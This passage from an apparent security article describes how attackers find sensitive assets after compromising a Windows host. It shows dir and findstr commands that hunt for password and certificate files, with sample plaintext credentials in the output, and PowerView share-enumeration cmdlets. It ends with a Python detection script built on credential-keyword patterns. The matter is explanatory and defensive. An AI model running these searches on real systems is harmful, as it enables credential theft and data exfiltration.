The simplest example of asset discovery is a file search on the compromised system. It is common to see backdoors with built-in functionality for searching the target's file system. However, attackers may also rely on native commands that serve the same purpose when no malware is present and only shell access is available. In such a case, a variation of the following command can be used by an adversary to look for sensitive files.
C:\Users\RayC\Desktop>dir *password.txt *.cert* *.docx *.pdf /s
Directory of C:\Users\RayC\Desktop
2014-01-27 12:37 50 facebook_password.txt
Directory of C:\Users\RayC\Desktop\projects
2016-07-07 12:13 111,303 2016_concept.docx
2016-08-27 02:06 711,303 2017_concept_v2.docx
2013-01-24 12:41 11,404 Bank_statement.docx
2016-08-19 17:40 134,303 Meeting_summary.docx
2015-02-27 18:55 171,303 RnD.docx
Directory of C:\Users\RayC\Desktop\projects
2015-05-27 12:42 90,512 Final_Report.pdf
Directory of C:\Users\RayC\Desktop\secrets
2011-08-27 12:39 792 Ray_C.cert
Another approach to finding relevant files is to list the files the user has recently accessed (the shortcuts kept in the Recent folder). This can be achieved by combining the dir and findstr commands, as shown below.
C:\>dir C:\Users\RayC\AppData\Roaming\Microsoft\Windows\Recent | findstr "docx pdf cert txt"
2016-08-27 12:39 725 Ray_C.cert.lnk
2016-08-26 00:20 537 a.txt.lnk
2016-08-20 19:55 1,402 Aanalysis_of_ The_Political_CMP.pdf.lnk
2016-08-20 19:55 1,277 CrowdStrike_Analysis.pdf.lnk
2016-08-27 12:37 821 enterprise_logins.txt.lnk
2016-08-27 12:36 695 facebook_password.txt.lnk
2016-08-27 12:42 984 Final_Report.pdf.lnk
2016-08-16 01:58 1,048 hint.txt.lnk
2016-08-26 00:01 647 INSTRUCTIONS.txt.lnk
2016-08-20 19:55 1,342 Microsoft_Report.pdf.lnk
2016-08-16 01:57 1,037 notes.txt.lnk
2016-08-27 12:40 761 RnD.docx.lnk
2016-08-23 22:46 1,107 rpt-2016.pdf.lnk
2016-08-24 00:42 1,107 rpt-2015.pdf.lnk
2016-08-20 19:57 1,307 tactical-investments.pdf.lnk
2016-08-20 20:02 1,332 visiting_conference.pdf.lnk
2016-08-20 20:14 1,177 wp-operation-status.pdf.lnk
While searching for files by a fragment of the filename is a quick way to initially discover interesting assets, a more efficient way is to search files by their contents. This can also be done with native Windows commands such as find or findstr. An example of looking for user credentials in a specified location is provided below.
C:\Users\johndoe\Desktop>findstr /S/I "username password certificate" *.cert *.txt
facebook_password.txt:username: RayC
facebook_password.txt:password: YouWillNewverGuess!!!
secrets\enterprise_logins.txt:username: Ray
secrets\enterprise_logins.txt:password: Uyre^3!q3.?
secrets\enterprise_logins.txt:username: RayC@contoso.com
secrets\enterprise_logins.txt:password: Default123!
secrets\Ray_C.cert:-----BEGIN CERTIFICATE-----
secrets\Ray_C.cert:-----END CERTIFICATE-----
In an enterprise environment, file servers are commonly used to store sensitive information. Therefore, a file search on remote systems can be performed from the compromised computer without the need to hack the file server itself. Provided the attacker has obtained credentials that grant access to files on the remote system, the PowerView tool can be used to enumerate network shares and search them, as shown in the example below.
PS C:\Users\RayC> Invoke-ShareFinder -ExcludeStandard
\\NODE4.contoso.com\Documents -
\\NODE4.contoso.com\Users -
\\FILE_SERVER.contoso.com\Storage -
\\FILE_SERVER.contoso.com\Users -
\\NODE2.contoso.com\New folder -
\\NODE2.contoso.com\Users -
\\NODE3.contoso.com\Users -
\\NODE1.contoso.com\Users -
\\SLC-DC01.contoso.com\Address - "Access to address objects"
\\SLC-DC01.contoso.com\CertEnroll - Active Directory Certificate Services share
\\SLC-DC01.contoso.com\ExchangeOAB - OAB Distribution share
\\SLC-DC01.contoso.com\GroupMetrics - MailTips group metrics publishing point
\\SLC-DC01.contoso.com\NETLOGON - Logon server share
\\SLC-DC01.contoso.com\PSTFiles -
\\SLC-DC01.contoso.com\SYSVOL - Logon server share
\\SLC-DC01.contoso.com\Templates -
PS C:\Users\RayC> Find-InterestingFile \\FILE_SERVER\Storage -OfficeDocs
FullName : \\FILE_SERVER\Storage\Contract_BANK_X.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:47:46 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 41187
FullName : \\FILE_SERVER\Storage\Contract_Legal.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:46:44 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 23829
FullName : \\FILE_SERVER\Storage\Expenses.xlsx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:51:53 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 37989
FullName : \\FILE_SERVER\Storage\Financial_Report.xlsx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:51:14 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 8802
FullName : \\FILE_SERVER\Storage\Report_December_2015.docx
Owner : BUILTIN\Administrators
LastAccessTime : 8/10/2016 4:54:11 PM
LastWriteTime : 8/10/2016 4:45:58 PM
CreationTime : 8/10/2016 4:54:11 PM
Length : 12589
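From the defender's side, the discovery commands shown above (the native dir and findstr searches as well as the PowerView cmdlets) leave process-creation events behind. The following Python is an added example, not code from the original article or from PowerView: it runs a few detection rules over constructed sample events whose (host, user, command line) shape and keyword lists are assumptions chosen for illustration.

```python
import re

# Constructed sample process-creation events as (host, user, command line) tuples,
# the fields a Sysmon Event ID 1 or Windows Security 4688 record would supply.
SAMPLE_EVENTS = [
    ("NODE1", "contoso\\rayc", 'cmd.exe /c dir *password.txt *.cert* *.docx *.pdf /s'),
    ("NODE1", "contoso\\rayc", 'findstr /S/I "username password certificate" *.cert *.txt'),
    ("NODE1", "contoso\\rayc", 'cmd.exe /c dir C:\\Users\\RayC\\AppData\\Roaming\\Microsoft\\Windows\\Recent | findstr "docx pdf cert txt"'),
    ("NODE2", "contoso\\svc_build", 'powershell.exe -Command "Invoke-ShareFinder -ExcludeStandard"'),
    ("NODE2", "contoso\\svc_build", 'powershell.exe -Command "Find-InterestingFile \\\\FILE_SERVER\\Storage -OfficeDocs"'),
    ("NODE3", "contoso\\alice", 'cmd.exe /c dir /s C:\\build\\*.log'),
    ("NODE3", "contoso\\alice", 'findstr /I "error" C:\\build\\output.txt'),
]

# Keywords and patterns taken from the discovery commands above (assumed; tune per environment).
SENSITIVE_TERMS = ("password", "cert", "login", "credential", "secret")
DOC_PATTERNS = ("*.docx", "*.xlsx", "*.pdf", "*.doc", "*.xls")
POWERVIEW_CMDLETS = ("invoke-sharefinder", "find-interestingfile")

def classify(cmdline):
    """Return detection tags for one command line; an empty list means no rule matched."""
    c = cmdline.lower()
    tags = []
    # Rule 1: recursive dir listing that names credential-like or office-document patterns.
    if re.search(r"\bdir\b", c) and "/s" in c and any(t in c for t in SENSITIVE_TERMS + DOC_PATTERNS):
        tags.append("recursive_dir_sensitive")
    # Rule 2: enumeration of the user's Recent folder (LNK shortcuts to opened files).
    if re.search(r"\bdir\b", c) and "\\recent" in c:
        tags.append("recent_items_enum")
    # Rule 3: content search with findstr for credential keywords.
    if re.search(r"\bfindstr\b", c) and any(t in c for t in SENSITIVE_TERMS):
        tags.append("findstr_credentials")
    # Rule 4: PowerView share enumeration / interesting-file hunting cmdlets.
    if any(p in c for p in POWERVIEW_CMDLETS):
        tags.append("powerview_file_discovery")
    return tags

def hunt(events):
    """Return (host, user, tags) for every event that matched at least one rule."""
    tagged = [(host, user, classify(cmd)) for host, user, cmd in events]
    return [hit for hit in tagged if hit[2]]

def summarize(hits):
    """Group matched tags by host so hosts showing several discovery behaviours stand out."""
    per_host = {}
    for host, _user, tags in hits:
        per_host.setdefault(host, set()).update(tags)
    return per_host
```

A host that accumulates several distinct tags in a short window (NODE1 in the sample) is a stronger hunting lead than any single command line, since a developer's dir /s over build logs matches none of the rules.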
Finally, it's worth mentioning that files are not always the asset an attacker is looking for. For example, the correspondence between specific people is sometimes of interest. In such a case, attackers try to gain access to communication channels such as email or instant-messaging accounts, mobile phones, etc. Additionally, access to a specific computer on the network can also be the intruders' target; if so, attackers try to locate that computer on the network and gain access to it.